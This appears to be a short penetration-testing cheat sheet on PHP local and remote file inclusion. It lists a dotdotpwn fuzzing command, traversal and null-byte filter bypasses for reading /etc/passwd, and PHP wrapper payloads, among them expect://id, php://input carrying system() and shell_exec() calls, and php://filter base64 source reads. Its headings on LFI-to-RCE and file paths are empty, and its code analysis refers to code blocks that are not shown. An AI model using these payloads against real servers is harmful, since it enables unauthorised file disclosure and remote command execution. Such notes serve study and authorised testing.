search

php wrappers, LFI

hashtag
dotdotpwnarrow-up-right

Note: preinstalled in latest kali iso. Works for http, ftp, tftp

dotdotpwn -h IP -m MODE -f FILE-TO-FUZZ -U USER -P PASS

hashtag
Workarounds

NOTE: Read the file that is running LFI to get more information about the code.

  • Bypassing filters using ....//

  • Using null byte %00: /etc/passwd%00

  • URL encoding techniques (double encoding)

hashtag
LFI wordlist

  • /usr/share/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest.txt

hashtag
.php wrappers

# protocol wraper
file=http://IP/
file=ftp://IP/
file=//IP/smb-share/file

# expect wrapper
# allows to run system commands
file=expect://id

# input wrapper
file=php://input
# needs to send POST data
<?php system('id'); ?> | <?php shell_exec('id'); ?>

# filter wrappers
file=php://filter/resource=PHP-FILE
file=filter/read=string.rot13/resource=PHP-FILE
file=php://filter/convert.base64-encode/resource=PHP-FILE

hashtag
LFI to RCE (linux)

hashtag
LFI Paths (linux)

hashtag
LFI Paths (windows)

hashtag
LFI PHP Code Analysis

The above code block includes any value given to the file paramter.

The above code block includes any value given to the file parameter as long as its in the downloads directory. To bypass use ../../../<>

The above code block includes any value given to the file parameter as long as its in the downloads directory and appends .php to the user input value. To bypass use ../../../<> and value ending with %00.

When there is substitution for ../, bypass using ....// as it will convert to ../

hashtag
RFI PHP Code Analysis

Requirement for RFI to work is allow_url_fopen and allow_url_include

Previouspgp gpg cheatsheetNextport forwarding

Last updated